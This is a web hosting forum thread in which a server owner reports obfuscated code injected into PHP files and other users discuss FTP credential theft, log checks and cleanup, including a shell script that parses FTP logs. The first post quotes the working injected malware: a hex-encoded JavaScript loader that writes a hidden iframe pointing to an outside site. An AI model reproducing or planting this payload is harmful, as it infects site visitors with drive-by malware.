Strange Code - Not Added By Me

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I think I have some bug on my VPS (I have root access). In my index.php (and give it time it'll spread to my header and footer.php too) I find this code;

Code:
<?
#3b3cf8#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                asq=function(){return n[i];};ww=window;ss=String[\"fro\"+\"mC\"+\"harC\"+\"o\"+\"de\"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n=\"0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x75,0x7a,0x66,0x68,0x62,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x78,0x78,0x78,0x2f,0x71,0x73,0x6a,0x77,0x62,0x75,0x66,0x74,0x76,0x71,0x66,0x73,0x64,0x62,0x73,0x74,0x2f,0x64,0x70,0x6e,0x30,0x78,0x71,0x6a,0x6e,0x62,0x68,0x66,0x74,0x30,0x73,0x66,0x6d,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x75,0x7a,0x66,0x68,0x62,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x75,0x7a,0x66,0x68,0x62,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c\".split(\",\");h=2;s=\"\";if(whwej){for(i=0;i-510!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww[\"eval\"](\"\"+s);}}}}</script>";

#/3b3cf8#
?>
Does anyone know what this is and/or how to get rid of it? :/ I've had to completely reformat my server once before, but now I have a couple of clients on it and I don't want to blow their work out. It's been two to three weeks since the server reformat and this thing is back. I don't understand it. I'm not running joomla at all. These are simple php files that I've created without the help of any other software. The only other things I'm running are Piwigo gallery, fanupdate 3, phpbb (latest), and TheHostingTool. This thing was on the server (before the rebuild) and at the time phpbb and thehostingtool weren't installed. :/
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
ClamAV and Maldetect found absolutely nothing at all. As far as rootkit, I have no idea where I can grab one for the server and install via ssh :/
 

quietFinn

Well-Known Member
Feb 4, 2006
1,222
87
178
Finland
cPanel Access Level
Root Administrator
I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages
Ftp access logs from a ? at the local ip. Do you know how to prevent this by chance?
 

quietFinn

Well-Known Member
Feb 4, 2006
1,222
87
178
Finland
cPanel Access Level
Root Administrator
In /var/log/messages you see if someone has connected to that account using FTP, and in that case you see the IP address they connect from. Blocking that IP does not really help, but if you see that FTP has been used to upload those changed files then you know the way they have used.

The password of that account must be changed of course, and the owner of that account (or anyone who had the password) must scan their PC very well.
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I rebuilt my computer completely to get rid of the Trojan that was on it. I went back into cpanel to clean the files and am finding this instead. Is it the same thing?

Code:
<!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->
Code:
<?
#3b3cf8#
echo('<img src=\"http://localhost/\" >');
#/3b3cf8#
?>
Should I be going through SSH and finding all instances of this code?
 

mattsh

Registered
Sep 10, 2013
1
0
1
cPanel Access Level
Root Administrator
I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem.

Aside from scans, does anyone have any specific ideas on how to fix this?
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,913
2,202
363
I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem. Aside from scans, does anyone have any specific ideas on how to fix this?
I recommend consulting with a qualified system administrator to investigate your system to determine how it was exploited. Note that if your server was rooted, reinstalling the OS/cPanel and restoring the accounts is typically the best way to ensure the server is cleaned.

Thank you.
 

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
I've seen this hack a ton of times. 99.99% of the time the server is not rooted: either your FTP password was used to upload the modified files, or your CMS had a weak admin password or old plugin used to modify the files.

If you're lucky and you disabled cPanel's default 24 hour deletion of access logs for Apache, you can use the time stamps from the files to consult your apache domlogs to see if there is a malicious PHP script used around that time.

You will ultimately need to remove the bad code or restore the infected files from a clean backup. At that time make sure you disable domlog deletion in WHM, or enable Raw Access Log archiving in cPanel for the domain; this way if it gets "hacked" again you can track it down.
 

Aaron.Edwards

Active Member
Sep 21, 2013
36
0
6
cPanel Access Level
Root Administrator
Ftp access logs from a ? at the local ip. Do you know how to prevent this by chance?
Try with the small shell script to check if some one tried to hack the user ftp account from the same ip address ?

Code:
#!/bin/sh
        awk '/pure-ftpd: \([^\?].*/ { print $6 }' /var/log/messages* |
        sed 's/^(\(.*\))/\1/' |
        awk [email protected] '{ if ($2) print $2 " " $1 }'  |
        sort | uniq |
        awk '{print $1}' |
        uniq -c |
        awk '{if ($1 > 2) print $2}' |
        while read ipaddr; do
                echo ${ipaddr}:
                awk '/pure-ftpd: \([^?].*@'${ipaddr}'\)/' /var/log/messages* |
                sed 's/^.*(\([a-z0-9A-Z_][[a-z0-9A-Z_]*\)@.*/\1/' |
                sort | uniq
        done